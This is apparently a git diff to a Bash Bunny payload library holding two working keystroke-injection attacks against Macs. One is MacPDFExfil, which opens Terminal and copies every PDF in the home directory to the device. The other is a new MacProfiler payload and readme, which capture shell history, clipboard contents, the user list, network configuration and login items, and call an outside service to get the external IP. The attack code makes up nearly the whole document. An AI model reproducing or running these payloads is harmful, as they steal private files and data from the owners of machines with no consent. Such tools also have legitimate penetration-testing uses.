diff --git a/payloads/library/exfiltration/MacPDFExfil/payload.txt b/payloads/library/exfiltration/MacPDFExfil/payload.txt index 0c363a27..d74275db 100644 --- a/payloads/library/exfiltration/MacPDFExfil/payload.txt +++ b/payloads/library/exfiltration/MacPDFExfil/payload.txt @@ -1,4 +1,4 @@ -#!/bin/bash +#!/bin/bash # # Title: MacPDFExfil # Author: k1ul3ss @@ -14,13 +14,15 @@ ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E dev_name="BashBunny" # loot directory -lootdir="/Volumes/$dev_name/loot/" +lootdir="/Volumes/$dev_name/loot/MacPDFExfil/" QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 3000 +QUACK STRING mkdir -p $lootdir +QUACK ENTER # Find all PDFs stored in the user's home directory, and copy them over to the BashBunny storage. QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal QUACK ENTER diff --git a/payloads/library/recon/MacProfiler/payload.txt b/payloads/library/recon/MacProfiler/payload.txt new file mode 100755 index 00000000..8727a39d --- /dev/null +++ b/payloads/library/recon/MacProfiler/payload.txt @@ -0,0 +1,52 @@ +#!/bin/bash +# +# Title: MacProfiler +# Author: jdetmold +# Version: 1.0 +# +# Creates a basic system profile for a mac computer +# Saves all data to loot/MacProfiler/{system name}/item.txt +# +# Saves the following data to individule files: +# +#Terminal history. +#Current clipboard contents. +#List of users on the system. +#ifconfig data. +#Systems WAN IP. +#All login items set to start up with the system. +#List of installed Applications from /Applications. +# +# +# Blue - Running +# Green - Finished +# + +LED B +ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE + +lootdir=/Volumes/BashBunny/loot/MacProfiler/$\(hostname\) + +# Start Terminal +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 2500 + +# Save data +QUACK STRING mkdir -p $lootdir\; history \> $lootdir/history.txt\; osascript -e \"the clipboard\" \> $lootdir/clipboard.txt\; dscl . list /Users \| grep -v '_' \> $lootdir/users.txt\; ifconfig \> $lootdir/ifconfig.txt\; curl ipecho.net/plain \> $lootdir/ExternalIP.txt\; osascript -e \'tell application \"System Events\" to get the name of every login item\' \>$lootdir/LoginItems.txt\; ls /Applications/ \> $lootdir/Applications.txt\; +QUACK ENTER +QUACK DELAY 1000 + +# Eject +QUACK STRING diskutil eject /Volumes/BashBunny/; +QUACK ENTER +QUACK STRING killall Terminal +QUACK ENTER + +# Sync filesystem +sync + +# Green LED for finished +LED G diff --git a/payloads/library/recon/MacProfiler/readme.md b/payloads/library/recon/MacProfiler/readme.md new file mode 100755 index 00000000..5962f903 --- /dev/null +++ b/payloads/library/recon/MacProfiler/readme.md @@ -0,0 +1,30 @@ +# MacProfiler +* Author: jdetmold +* Version: Version 1.0 +* Target: Mac + +## Description + +Uses a HID/Storage Attack to create a system profile including the following information: +Terminal history. +Current clipboard contents. +List of users on the system. +ifconfig data. +Systems WAN IP. +All login items set to start up with the system. +List of installed Applications from /Applications. + +## Configuration + +None needed. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Blue | Running | +| Green | Finished | + + +## Discussion +[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40829-payload-macprofiler/ "Hak5 Forum Thread")